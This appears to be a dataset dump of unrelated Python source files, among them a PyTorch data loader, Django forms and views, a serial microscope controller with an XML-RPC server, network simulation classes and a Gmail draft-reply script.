text stringlengths 38 1.54M |
|---|
import torch.utils.data as data
from glob import glob
import matplotlib.pyplot as plt
from torchvision import transforms
from PIL import Image
import random
import os
import numpy as np
import torch
class cudatatest(data.Dataset):
def __init__(self,scale):
super(cudatatest, self).__init__()
self.imgnames_LR=glob(os.path.join('testset','SR','x'+str(scale)+'_LR'+'*.npy'))
self.imgnames_HR=glob(os.path.join('testset','SR','x'+str(scale)+'_label'+'*.npy'))
self.imgnames_guide=glob(os.path.join('testset','SR','x'+str(scale)+'_guide'+'*.npy'))
self.imgnames_LR.sort()
self.imgnames_HR.sort()
self.imgnames_guide.sort()
def __getitem__(self, item):
self.depth = np.load(self.imgnames_LR[item],allow_pickle=True)
# print('0',self.depth.shape)
self.depth = np.transpose(self.depth, (0, 3, 1, 2))
# print('1',self.depth.shape)
self.depth = torch.from_numpy(self.depth)
# print('2',self.depth.shape)
self.depth=np.squeeze(self.depth,axis=0)
# print('3',self.depth.shape)
self.gt = np.load(self.imgnames_HR[item],allow_pickle=True)
self.gt = np.transpose(self.gt, (0, 3, 1, 2))
self.gt = torch.from_numpy(self.gt)
self.gt=np.squeeze(self.gt,axis=0)
self.guide = np.load(self.imgnames_guide[item],allow_pickle=True)
self.guide = np.transpose(self.guide, (0, 3, 1, 2))
self.guide = torch.from_numpy(self.guide)
self.guide=np.squeeze(self.guide,axis=0)
return (self.depth, self.gt,self.guide)
def __len__(self):
return len(self.imgnames_LR)
if __name__ == '__main__':
dataset = msdatatest(4)
dataloader = data.DataLoader(dataset, batch_size=1)
for b1, (img_L,img_gt, img_RGB) in enumerate(dataloader):
# print(b1)
print(img_L.shape, img_RGB.shape) |
"""
BSD 3-Clause License
Copyright (c) 2016-2019 Russ 'trdwll' Treadwell. All rights reserved.
"""
from django import forms
from django.contrib.auth.models import User
#from . models import UserProfile
from django.contrib.auth.forms import UserCreationForm
from django.utils.translation import ugettext_lazy as _
from captcha.fields import CaptchaField
class RegistrationForm(UserCreationForm):
captcha = CaptchaField()
username = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username'}),
min_length=3, label='Username', required=True, help_text='Choose a unique username to login with.')
# email = forms.CharField(
# widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Email Address'}),
# min_length=5, label='Email Address', required=True,
# help_text='Feel free to use a fake or even a disposable email address. We don\'t verify the email, it\'s only used to recover the account or if we need to contact you.')
placeholder = 'Must be at least 8 characters'
password1 = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
min_length=8, label='Password', required=True, help_text='Enter your password!')
password2 = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
min_length=8, label='Confirm Password', required=True, help_text='Confirm your password!')
class Meta:
model = User
fields = [
'username',
# 'email',
'password1',
'password2',
'captcha'
]
class LoginForm(forms.Form):
username = forms.CharField(
widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Username'}),
min_length=3, label='Username', required=True)
password = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Must be at least 8 characters'}),
min_length=8, label='Password', required=True, help_text='Enter your password!')
captcha = CaptchaField()
class Meta:
fields = [
'username',
'password',
'captcha'
]
class UpdateProfileForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
user = kwargs.pop('user', None)
super(UpdateProfileForm, self).__init__(*args, **kwargs)
#self.fields['username'] = forms.CharField(widget=forms.TextInput(attrs={'value': user}))
userinfo = User.objects.get(username=user)
#useremail = userinfo.email
#self.fields['email'] = forms.CharField(
# widget=forms.EmailInput(attrs={'class': 'form-control', 'placeholder': 'Email Address', 'value': useremail}),
# min_length=5, label='Email Address', required=True)
placeholder = 'Must be at least 8 characters'
passwordcur = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
min_length=8, label='Current Password', required=True, help_text='Enter your current password to verify the change.')
passwordnew = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
min_length=8, label='New Password', required=False, help_text='Make sure your new password isn\'t use anywhere else.')
passwordconf = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
min_length=8, label='Confirm New Password', required=False, help_text='Confirm your new password!')
class Meta:
model = User
fields = [
# 'username',
'passwordcur',
# 'email',
'passwordnew',
'passwordconf'
]
# class RecoverAccountForm(forms.ModelForm):
# captcha = CaptchaField()
# username = forms.CharField(
# widget=forms.TextInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your Username.'}),
# min_length=4, label='Username', required=True)
# email = forms.CharField(
# widget=forms.EmailInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your Email.'}),
# min_length=5, label='Email', required=True)
# recovery_key = forms.CharField(
# widget=forms.TextInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your recovery key.'}),
# min_length=5, label='Recovery Key', required=True)
# class Meta:
# model = UserProfile
# fields = [
# 'username',
# 'email',
# 'recovery_key',
# 'captcha'
# ]
# class RecoverAccountResetForm(forms.ModelForm):
# placeholder = 'Must be at least 8 characters'
# password1 = forms.CharField(
# widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
# min_length=8, label='New Password', required=True, help_text='Make sure your new password isn\'t use anywhere else.')
# password2 = forms.CharField(
# widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': placeholder}),
# min_length=8, label='Confirm New Password', required=True, help_text='Confirm your new password!')
# class Meta:
# model = User
# fields = [
# 'password1',
# 'password2'
# ]
# class RecoveryCodeSetupForm(forms.Form):
# password1 = forms.CharField(
# widget=forms.PasswordInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Must be at least 8 characters'}),
# min_length=8, label='Current Password', required=True, help_text='Your current password')
# recovery_key = forms.CharField(
# widget=forms.TextInput(attrs={'class': 'form-control', 'value': '', 'placeholder': 'Enter your Recovery Key.'}),
# min_length=4, label='Recovery Key', required=True)
# class Meta:
# fields = [
# 'password1',
# 'recovery_key'
# ] |
from os import path
import serial
from time import sleep
from datetime import datetime
from twisted.internet import endpoints
from twisted.web import xmlrpc, server
from AutoFocus import AutoFocus, Camera
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# create a file handler
handler = logging.FileHandler('PANAKEIA.log')
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
class Microscope:
def __init__(self, port):
self.ser = serial.Serial(port, 9600)
#Flash the DTR pin to reset the Arduino (Needed so the Arduino is in a known state)
self.ser.setDTR(False)
sleep(0.22)
self.ser.setDTR(True)
for index in range(1):
line = self.ser.readline()
print index, line
def __del__(self):
self.ser.close()
def run_command(self, command):
"""TODO: Description"""
logger.info('Running command %s', command)
self.ser.write(command)
line = ''
return_value = ''
while line != 'OK\r\n':
line = self.ser.readline()
logger.info('Response %s', line)
if line.startswith('ERR:'):
raise Exception(line)
if line.startswith('RETURN:'):
return_value = line.split(':')[1].strip()
return return_value
def check_axis(self, axis):
"""Checks that the axis string corresponds to a valid axis"""
if axis not in ['x', 'y', 'z']:
raise Exception('Not a valid axis!')
def calibrate(self):
"""Starts the calibration procedure for the Microscope"""
command = 'calibrate\n'
self.run_command(command)
def is_calibrated(self):
"""Check if the microscope is calibrated"""
command = 'is_calibrated\n'
line = self.run_command(command)
if line == '1':
return True
else:
return False
def get_length(self, axis):
"""Returns the length of the specified axis"""
self.check_axis(axis)
command = axis + '_get_length\n'
length = self.run_command(command)
return int(length)
def get_position(self, axis):
"""Get the current position of the specified axis"""
self.check_axis(axis)
command = axis + '_get_position\n'
position = self.run_command(command)
return int(position)
def get_distance_to_go(self, axis):
"""Get the distance between current and target position of the specified axis"""
self.check_axis(axis)
command = axis + '_get_distance_to_go\n'
distance = self.run_command(command)
return int(distance)
def get_state(self, axis):
"""Get the current state of the motor STOPPED=0,FWD=1,BACKWAD=-1"""
self.check_axis(axis)
command = axis + '_get_state\n'
state = self.run_command(command)
return int(state)
def move(self, axis, steps):
"""Move the specified axis relative to current position"""
self.check_axis(axis)
command = axis + '_move ' + str(steps) + '\n'
self.run_command(command)
def move_to(self, axis, position):
"""Move the specified axis to an absolute position"""
self.check_axis(axis)
command = axis + '_move_to ' + str(position) + '\n'
self.run_command(command)
def wait_to_finish(self, axis):
"""Wait for the axis to complete work"""
state = self.get_distance_to_go(axis)
while state != 0:
sleep(1)
state = self.get_distance_to_go(axis)
def set_mode(self, axis, mode):
"""Set microstepping mode of the specified axis"""
self.check_axis(axis)
command = axis + '_set_mode ' + str(mode) + '\n'
self.run_command(command)
def set_length(self, axis, length):
"""Set working length of the specified axis"""
self.check_axis(axis)
command = axis + '_set_length ' + str(length) + '\n'
self.run_command(command)
def set_factor(self, axis, factor):
"""Set the step factor of the specified axis"""
self.check_axis(axis)
command = axis + '_set_factor ' + str(factor) + '\n'
self.run_command(command)
def mark_calibrated(self):
"""Loaded previous calibration - mark as calibrated"""
command = 'mark_calibrated' + '\n'
self.run_command(command)
class MicroscopeServer(xmlrpc.XMLRPC):
def __init__(self, serial_port, allowNone=True, useDateTime=False):
self.serial_port = serial_port
xmlrpc.XMLRPC.__init__(self, allowNone, useDateTime)
def xmlrpc_initialize(self):
self.microscope = Microscope(self.serial_port)
try:
with open('./PANAKEIA.conf') as infile:
import json
json_data = json.load(infile)
self.microscope.set_length('x', json_data['x_length'])
self.microscope.set_length('y', json_data['y_length'])
self.microscope.set_length('z', json_data['z_length'])
self.microscope.mark_calibrated()
self.camera = Camera('./')
max_sweep_steps = 8
self.focus_control = AutoFocus(self.microscope, self.camera, logger,
sweepsteps=4, steps=20,
min_steps=1, max_sweep_steps=max_sweep_steps,
number_of_times=2, precision=0.99)
except IOError as e:
pass
def xmlrpc_raw(self, command):
"""TODO: Description"""
ret = self.microscope.run_command(command)
return ret
def xmlrpc_calibrate(self):
"""TODO: Description"""
self.microscope.calibrate()
def xmlrpc_is_calibrated(self):
"""TODO: Description"""
calibrated = self.microscope.is_calibrated()
return calibrated
def xmlrpc_get_length(self, axis):
"""TODO: Description"""
length = self.microscope.get_length(axis)
return length
def xmlrpc_get_position(self, axis):
"""TODO: Description"""
position = self.microscope.get_position(axis)
return position
def xmlrpc_get_distance_to_go(self, axis):
"""TODO: Description"""
distance = self.microscope.get_distance_to_go(axis)
return distance
def xmlrpc_get_state(self, axis):
"""TODO: Description"""
state = self.microscope.get_state(axis)
return state
def xmlrpc_move(self, axis, position):
"""TODO: Description"""
self.microscope.move(axis, position)
def xmlrpc_move_to(self, axis, position):
"""TODO: Description"""
self.microscope.move_to(axis, position)
def xmlrpc_set_mode(self, axis, mode):
"""TODO: Description"""
self.microscope.set_mode(axis, mode)
def xmlrpc_set_length(self, axis, length):
"""TODO: Description"""
self.microscope.set_length(axis, length)
def xmlrpc_set_factor(self, axis, factor):
"""TODO: Description"""
self.microscope.set_factor(axis, factor)
def xmlrpc_save_calibration(self):
"""TODO: Description"""
if self.microscope.is_calibrated():
x_length = self.microscope.get_length('x')
y_length = self.microscope.get_length('y')
z_length = self.microscope.get_length('z')
json_data = {'x_length': x_length,
'y_length': y_length,
'z_length': z_length}
with open("./PANAKEIA.conf", "w") as outfile:
import json
json.dump(json_data, outfile, indent=4)
def xmlrpc_focus(self):
self.focus_control.full()
def xmlrpc_scan(self, slide_id):
self.focus_control.scan(slide_id)
def xmlrpc_take_picture(self):
"""Takes a photograph with datetime string for filename"""
x_pos = self.microscope.get_position('x')
y_pos = self.microscope.get_position('y')
z_pos = self.microscope.get_position('z')
image_path = self.camera.snapshot(x_pos, y_pos, z_pos)
if __name__ == '__main__':
from twisted.internet import reactor
r = MicroscopeServer('/dev/ttyACM0')
endpoint = endpoints.TCP4ServerEndpoint(reactor, 7080)
endpoint.listen(server.Site(r))
reactor.run()
|
import networkx as nx
from numpy.random import random, choice, shuffle
from epidag.factory import get_workshop
import epidag.factory.arguments as vld
from abc import ABCMeta, abstractmethod
__author__ = 'TimeWizard'
__all__ = ['INetwork', 'NetworkLibrary', 'NetworkSet',
'NetworkGNP', 'NetworkBA', 'NetworkProb']
class INetwork(metaclass=ABCMeta):
def __init__(self):
self.Name = 'Network'
self.json = None
@abstractmethod
def initialise(self):
pass
@abstractmethod
def add_agent(self, ag):
pass
@abstractmethod
def remove_agent(self, ag):
pass
@abstractmethod
def reform(self):
pass
@abstractmethod
def degree(self, ag):
pass
@abstractmethod
def cluster(self, ag):
pass
@abstractmethod
def match(self, net_src, ags_new):
pass
@abstractmethod
def to_json(self):
return self.json
class Network(INetwork, metaclass=ABCMeta):
def __init__(self):
INetwork.__init__(self)
self.Graph = nx.Graph()
def __getitem__(self, ag):
try:
return list(self.Graph[ag].keys())
except KeyError:
return list()
def initialise(self):
pass
def add_agent(self, ag):
self.Graph.add_node(ag)
def remove_agent(self, ag):
self.Graph.remove_node(ag)
def degree(self, ag):
return self.Graph.degree(ag)
def cluster(self, ag):
return nx.clustering(self.Graph, ag)
def match(self, net_src, ags_new):
for f, t in net_src.Graph.edges():
self.Graph.add_edge(ags_new[f.Name], ags_new[t.Name])
class NetworkGNP(Network):
def __init__(self, p):
Network.__init__(self)
self.P = p
def add_agent(self, ag):
self.Graph.add_node(ag)
for ne in self.Graph.nodes():
if ne is not ag and random() < self.P:
self.Graph.add_edge(ag, ne)
def reform(self):
new = nx.Graph()
new.add_nodes_from(self.Graph.node)
g = nx.gnp_random_graph(len(self.Graph), self.P, directed=False)
idmap = {i: ag for i, ag in enumerate(new.nodes.data().keys())}
for u, v in g.edges():
new.add_edge(idmap[u], idmap[v])
self.Graph = new
def __repr__(self):
return 'GNP(N={}, P={})'.format(len(self.Graph), self.P)
__str__ = __repr__
def to_json(self):
return {'Name': self.Name, 'Type': 'GNP', 'p': self.P}
class NetworkProb(INetwork):
def __init__(self, p):
INetwork.__init__(self)
self.Outside = list()
self.Inside = list()
self.P = p
def __getitem__(self, ag):
if ag in self.Inside:
return [nei for nei in self.Inside if ag is not nei]
return []
def add_agent(self, ag):
if random() < self.P:
self.Inside.append(ag)
else:
self.Outside.append(ag)
def cluster(self, ag):
# todo
return 0
def degree(self, ag):
if ag in self.Outside:
return 0
else:
return len(self.Inside) - 1
def initialise(self):
self.Outside = list()
self.Inside = list()
def match(self, net_src, ags_new):
self.Outside = [ags_new[ag.Name] for ag in net_src.Outside]
self.Inside = [ags_new[ag.Name] for ag in net_src.Inside]
def remove_agent(self, ag):
self.Outside.remove(ag)
self.Inside.remove(ag)
def reform(self):
ags = list(self.Outside) + list(self.Inside)
for ag in ags:
self.add_agent(ag)
def __repr__(self):
n = len(self.Inside) + len(self.Outside)
return 'Prob(N={}, P={})'.format(n, self.P)
__str__ = __repr__
def to_json(self):
return {'Name': self.Name, 'Type': 'Prob', 'p': self.P}
class NetworkBA(Network):
def __init__(self, m):
Network.__init__(self)
self.M = m
self.__repeat = list()
def add_agent(self, ag):
"""
Add an agent into this network; adopted from barabasi_albert_graph in Networkx package
:param ag: an agent in the model
:type ag: Agent
"""
self.Graph.add_node(ag)
num = len(self.Graph)
if num < self.M:
self.__repeat.append(ag)
return
elif num is self.M:
agl = [ag] * int(self.M)
self.Graph.add_edges_from(zip(agl, self.__repeat))
self.__repeat.extend(agl)
return
targets = set()
while len(targets) < self.M:
targets.add(choice(self.__repeat))
agl = [ag] * self.M
self.Graph.add_edges_from(zip(agl, targets))
self.__repeat.extend(agl)
def remove_agent(self, ag):
self.__repeat = [a for a in self.__repeat if a is not ag]
Network.remove_agent(self, ag)
def reform(self):
new = nx.Graph()
new.add_nodes_from(self.Graph.node)
g = nx.barabasi_albert_graph(len(self.Graph), self.M)
ids = list(new.node.keys())
shuffle(ids)
idmap = {i: ag for i, ag in enumerate(ids)}
for u, v in g.edges():
new.add_edge(idmap[u], idmap[v])
self.Graph = new
def match(self, net_src, ags_new):
Network.match(self, net_src, ags_new)
self.__repeat = [ags_new[a.Name] for a in net_src.__repeat]
def __repr__(self):
return 'Barabasi_Albert(N={}, M={})'.format(len(self.Graph), self.M)
__str__ = __repr__
def to_json(self):
return {'Name': self.Name, 'Type': 'BA', 'm': self.M}
class NetworkSet:
def __init__(self):
self.Nets = dict()
def __setitem__(self, key, value):
if not isinstance(value, INetwork):
raise AttributeError('Network object should inherit from INetwork')
self.Nets[key] = value
def __getitem__(self, item):
return self.Nets[item]
def __contains__(self, item):
return item in self.Nets
def list(self):
return list(self.Nets.keys())
def append(self, net_name, net):
if not isinstance(net, INetwork):
raise AttributeError('Network object should inherit from INetwork')
self.Nets[net_name] = net
def append_from_json(self, net_name, js):
net = NetworkLibrary.create_from_json(js)
self.append(net_name, net)
def append_from_def(self, net_name, df, loc=None):
net = NetworkLibrary.parse(df, loc=loc)
self.append(net_name, net)
def reform(self, net=None):
if net:
try:
self.Nets[net].reform()
except KeyError:
raise KeyError('No this net')
else:
for net in self.Nets.values():
net.reform()
def add_agent(self, ag):
for net in self.Nets.values():
net.add_agent(ag)
def remove_agent(self, ag):
for net in self.Nets.values():
net.remove_agent(ag)
def neighbours_of(self, ag, net=None):
if net:
try:
return list(self.Nets[net][ag])
except KeyError:
return list()
else:
return {k: list(v[ag]) for k, v in self.Nets.items()}
def neighbour_set_of(self, ag):
ns = set()
for net in self.Nets.values():
try:
ns.update(net[ag])
except KeyError:
pass
return ns
def clear(self, net=None):
if net:
try:
self.Nets[net].clear()
except KeyError:
pass
else:
for net in self.Nets.values():
net.clear()
def match(self, nets_src, ags_new):
for k, net_src in nets_src.Nets.items():
self[k].match(net_src, ags_new)
def __repr__(self):
return '[{}]'.format(', '.join(['{}: {}'.format(*it) for it in self.Nets.items()]))
def __str__(self):
return '[{}]'.format('\n'.join(['\t{}: {}'.format(*it) for it in self.Nets.items()]))
NetworkLibrary = get_workshop('Networks')
NetworkLibrary.register('BA', NetworkBA, [vld.PositiveInteger('m')], ['name'])
NetworkLibrary.register('GNP', NetworkGNP, [vld.Prob('p')], ['name'])
NetworkLibrary.register('Category', NetworkProb, [vld.Prob('p')], ['name'])
if __name__ == '__main__':
ns1 = NetworkBA(m=2)
ns2 = NetworkGNP(p=0.3)
ns3 = NetworkProb(p=0.2)
for nod in range(20):
ns1.add_agent('Ag{}'.format(nod))
ns2.add_agent('Ag{}'.format(nod))
ns3.add_agent('Ag{}'.format(nod))
# ns1.reform()
ag1 = ns1['Ag1']
nsc = NetworkSet()
nsc['N1'] = NetworkBA(m=2)
nsc['N2'] = NetworkGNP(p=0.3)
for nod in range(100):
nsc.add_agent('Ag{}'.format(nod))
print(nsc.neighbours_of('Ag1'))
print(nsc.neighbours_of('Ag2', 'N1'))
|
import json
from pprint import pprint
import csv
hashmap = {}
result = []
# create hashmap -- mapping of objectID & index of object from restaurants_list.csv
with open('restaurants_list.json') as data_file:
restaurant_data = json.load(data_file)
for idx, obj in enumerate(restaurant_data):
objectID = obj['objectID']
hashmap[str(objectID)] = obj
# print hashmap
# iterate csv file -- lookup objectId from hashmap, assign attributes to json object
with open('restaurants_info.csv', 'rb') as info_file:
reader = csv.reader(info_file)
next(reader, None) # skip the headers
for row in reader:
column = ''.join(row).split(';')
objectID = str(column[0])
restaurant = hashmap[objectID]
#add additional info from csv file
restaurant['food_type'] = column[1]
restaurant['stars_count'] = float(column[2])
restaurant['reviews_count'] = column[3]
restaurant['neighborhood'] = column[4]
restaurant['phone_number'] = column[5]
restaurant['price_range'] = column[6]
restaurant['dining_style'] = column[7]
options = restaurant['payment_options']
#clean up payment options
if ('Diners Club' in options or 'Carte Blanche' in options or 'JCB' in options) and ('Discover' not in options):
restaurant['payment_options'].append('Discover')
restaurant['payment_options'] = [opt for opt in options if opt not in ('Diners Club', 'Carte Blanche', 'JCB', 'Pay with OpenTable')]
print restaurant
result.append(restaurant)
# output file
print result
print len(result)
with open('output_restaurants1.json', 'w') as outfile:
json.dump(result, outfile)
|
from oauth2client import client, crypt
CLIENT_ID = '728044119950-mpcea0183l7c87lflutdide1vfdmvjrb.apps.googleusercontent.com'
def validate_user_id(userId):
# (Receive token by HTTPS POST)
if userId == -1:
print('USER ID ENTERED AS -1')
return -1
try:
idinfo = client.verify_id_token(userId, CLIENT_ID)
# Or, if multiple clients access the backend server:
# idinfo = client.verify_id_token(token, None)
# if idinfo['aud'] not in [CLIENT_ID_1, CLIENT_ID_2, CLIENT_ID_3]:
# raise crypt.AppIdentityError("Unrecognized client.")
if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
raise crypt.AppIdentityError("Wrong issuer.")
# If auth request is from a G Suite domain:
# if idinfo['hd'] != GSUITE_DOMAIN_NAME:
# raise crypt.AppIdentityError("Wrong hosted domain.")
except crypt.AppIdentityError:
print('USER ID PARSED TO -1')
return -1
return idinfo['sub'] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-01 01:47
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oaiso', '0033_auto_20170701_1036'),
]
operations = [
migrations.CreateModel(
name='Shop',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('shop_name', models.TextField()),
('budget_min', models.IntegerField(blank=True, null=True)),
('budget_max', models.IntegerField(blank=True, null=True)),
('review', models.TextField(blank=True, null=True)),
('tel', models.BigIntegerField(blank=True, null=True)),
('address1', models.TextField()),
('address2', models.TextField()),
('address3', models.TextField()),
('address4', models.TextField()),
('lat', models.DecimalField(decimal_places=13, max_digits=16)),
('lng', models.DecimalField(decimal_places=13, max_digits=16)),
],
),
migrations.AlterField(
model_name='photo',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='oaiso.Shop'),
),
migrations.DeleteModel(
name='Shops',
),
]
|
import re
import pandas as pd
from step4 import *
import imaplib
import time
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from values import *
def fetchname(x):
your_string = re.sub('\W+', ' ', x)
bad_chars = ['Hi Rekha']
your_string = your_string.strip()
for i in bad_chars:
test_string = your_string.replace(i, '')
your_search_word = "Hi"
list_of_words = str(test_string).split()
next_word = list_of_words[list_of_words.index(your_search_word) + 1]
rem_char = [">"]
for j in rem_char:
last_word = next_word.replace(j, ' ')
return last_word
def draft(fromaddr, toaddr, messagebody,cc, subject):
message = MIMEMultipart('Mixed')
message['Subject'] = subject
message['From'] = fromaddr
message['to'] = toaddr
message['cc'] = cc
# message['bcc'] = 'testbcc@test.com'
message.attach(MIMEText(messagebody,'html'))
server = imaplib.IMAP4_SSL('imap.gmail.com')
server.login(username, password)
print("Draft Send")
server.append('[Gmail]/Drafts', '\Draft', imaplib.Time2Internaldate(time.time()), str(message).encode("utf-8"))
server.logout()
def string():
loaded = pd.read_csv("fromjson.csv", engine='python')
check = pd.read_csv("predictedresult.csv")
mergedStuff = pd.merge(loaded, check, on=['Subject'], how='inner')
for i in mergedStuff.index:
name = fetchname(mergedStuff['text/plain_x'][i])
if mergedStuff['Label'][i] == 1:
if thirdperson(mergedStuff["text/plain_y"][i]):
checkcc, name1 = thirdperson(mergedStuff["text/plain_y"][i])
if checkcc == 1:
if name:
if name1:
message = 'Hi ', name,",","""<pre><br>Thanks for connecting us with the team. <br><br>Hi """, name1, """ ,<br><br>Happy to e-meet you. <br><br>Do let me know when we can connect over a call. Here is a link to my calendar.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 """
messagebody = ''.join(message)
elif checkcc == 2:
if name:
message = 'Hi ', name1 ,",","""<pre><br>Happy to e-meet you. <br><br>Do let me know when we can connect over a call.<br><br>Here is a link to my calendar for a meeting at a convenient time of yours.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 """
messagebody = ''.join(message)
toaddr = mergedStuff["From_y"][i]
cc = ccvalue
fromaddr = mergedStuff["To_y"][i]
subject = mergedStuff["Subject"][i]
draft(fromaddr, toaddr, messagebody, cc, subject)
elif connect(mergedStuff["text/plain_y"][i]):
number, email, name1, date = connect(mergedStuff["text/plain_y"][i])
if date == 1:
if name:
# mark calender
message = 'Hi ', name,",","""<pre><br><br>Thanks for your response.<br><br>Surely, I will connect with you for a brief meeting. <br><br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br><br>+91 9930459453</pre>"""
messagebody = ''.join(message)
elif date == 2:
if name:
message = 'Hi ', name,",","""<pre><br>Thanks for your response.<br><br>Please select a convenient meeting time by clicking the below calendar link.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 </pre>"""
messagebody = ''.join(message)
elif date == 3:
if name:
message = 'Hi ', name,",","""<pre><br>Thanks for your response.<br><br>Please select a convenient meeting time by clicking the below calendar link.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 </pre>"""
messagebody = ''.join(message)
fromaddr = mergedStuff["To_y"][i]
toaddr = mergedStuff["From_y"][i]
cc = ccvalue
subject = mergedStuff["Subject"][i]
draft(fromaddr, toaddr, messagebody, cc, subject)
elif detail(mergedStuff["text/plain_y"][i]):
message = 'Hi ',name,",","""<pre><br>Thanks for your response. <br><br>Enclosed is a brief presentation about our company and solutions offering.<br><br>Happy to connect with you at a time convenient of yours to discuss a solution fitment.<br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 """
messagebody = ''.join(message)
fromaddr = mergedStuff["To_y"][i]
toaddr = mergedStuff["From_y"][i]
cc = ccvalue
subject = mergedStuff["Subject"][i]
draft(fromaddr, toaddr, messagebody, cc, subject)
elif mergedStuff['Label'][i] == 0:
if name:
message = 'Hi ', name,",","""<pre><br>Surely, noted.<br><br>Feel free to connect with us in the future if you would like to explore our offerings.<br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 </pre>"""
messagebody = ''.join(message)
fromaddr = mergedStuff["To_y"][i]
toaddr = mergedStuff["From_y"][i]
cc = ccvalue
subject = mergedStuff["Subject"][i]
draft(fromaddr, toaddr,messagebody, cc, subject)
|
from django.shortcuts import render, HttpResponse, redirect
def index(request):
print "-----in the INDEX ROUTE------------"
try:
request.session['total_spent']
request.session['items_bought']
except:
request.session['total_spent'] = 0
request.session['items_bought'] = 0
print type(request.session['items_bought'])
return render(request, 'amadon/index.html')
def process(request, methods='POST'):
print "-----------in the PROCESS ROUTE-----------"
request.session['items_bought']=int(request.session['items_bought'])
print type(request.session['items_bought'])
product_id = int(request.POST['product_id'])
if product_id== 1:
request.session['quantity'] = request.POST['quantity']
product = "Dojo Cup"
request.session['total'] = int(request.session['quantity']) * 4.99
request.session['total_spent'] += float(request.session['total'])
request.session['items_bought'] += int(request.session['quantity'])
print type(request.session['items_bought']), "<----------look at this--------"
elif product_id == 2:
request.session['quantity'] = request.POST['quantity']
product = "Dojo T-Shirt"
request.session['total'] = int(request.session['quantity']) * 19.99
request.session['total_spent'] += float(request.session['total'])
request.session['items_bought'] += int(request.session['quantity'])
elif product_id == 3:
request.session['quantity'] = request.POST['quantity']
product = "Dojo Sweater"
request.session['total'] = int(request.session['quantity']) * 29.99
request.session['total_spent'] += float(request.session['total'])
request.session['items_bought'] += int(request.session['quantity'])
else:
request.session['quantity'] = request.POST['quantity']
product = "Algorithm Book"
request.session['total'] = int(request.session['quantity']) * 49.99
request.session['total_spent'] += float(request.session['total'])
request.session['items_bought'] += int(request.session['quantity'])
return redirect('/amadon/buy')
def buy(request):
print "---------in the BUY ROUTE--------------"
return render(request, 'amadon/buy.html')
|
#!/usr/bin/env python3.6
import argparse
import git
import random
import re
import sys
import database
check_commit_pool = set()
check_email2comparisons = dict()
def check_comparison_id(commit1, commit2):
assert commit1 != commit2
return commit1 + commit2 if commit1 < commit2 else commit2 + commit1
# A comparison structure is a list that consists of the author email,
# the first commit hash, and the second commit hash.
def check_one_author(email, comparisons, n, m):
check_n = set()
check_m = set()
for comparison in comparisons:
c1 = comparison[1]
c2 = comparison[2]
assert c1 in check_commit_pool and c2 in check_commit_pool
if comparison[0] == email:
check_n.add(check_comparison_id(c1, c2))
else:
check_m.add(check_comparison_id(c1, c2))
assert len(check_n) <= n and len(check_m) == m
if len(check_n) < n:
print('Warning: %s is assigned with %d questions, less than n.' %
(email, len(check_n)))
def check(n, m):
for email, comparisons in check_email2comparisons.items():
check_one_author(email, comparisons, n, m)
max_ratio = 20
ratio_buckets = [0] * max_ratio
def record_ratio(a, b):
r = int(max(a / b, b / a))
if r > max_ratio:
r = max_ratio
ratio_buckets[r-1] += 1
def sum_percents():
s = sum(ratio_buckets)
return s, [n / s for n in ratio_buckets]
def compose_url(token, project_id):
return 'http://survey.persper.org/#/entry/%s?projectId=%s' % (
token, project_id)
def parse_repo_url(remote_url):
match = re.match(r'git@github.com:(.+)/(.+).git', remote_url)
if match is None:
match = re.match(r'http[s]?://github.com/(.+)/([^.]+)(?:\.git)?',
remote_url)
if match is None:
raise ValueError('Repository URL not recognized')
return match.group(1), match.group(2)
def parse_emails(file_path):
emails = []
with open(file_path) as f:
for line in f:
match = re.match(r'[\w.\-+]+@[\w.\-]+', line)
if match:
emails.append(match.group())
return emails
def main():
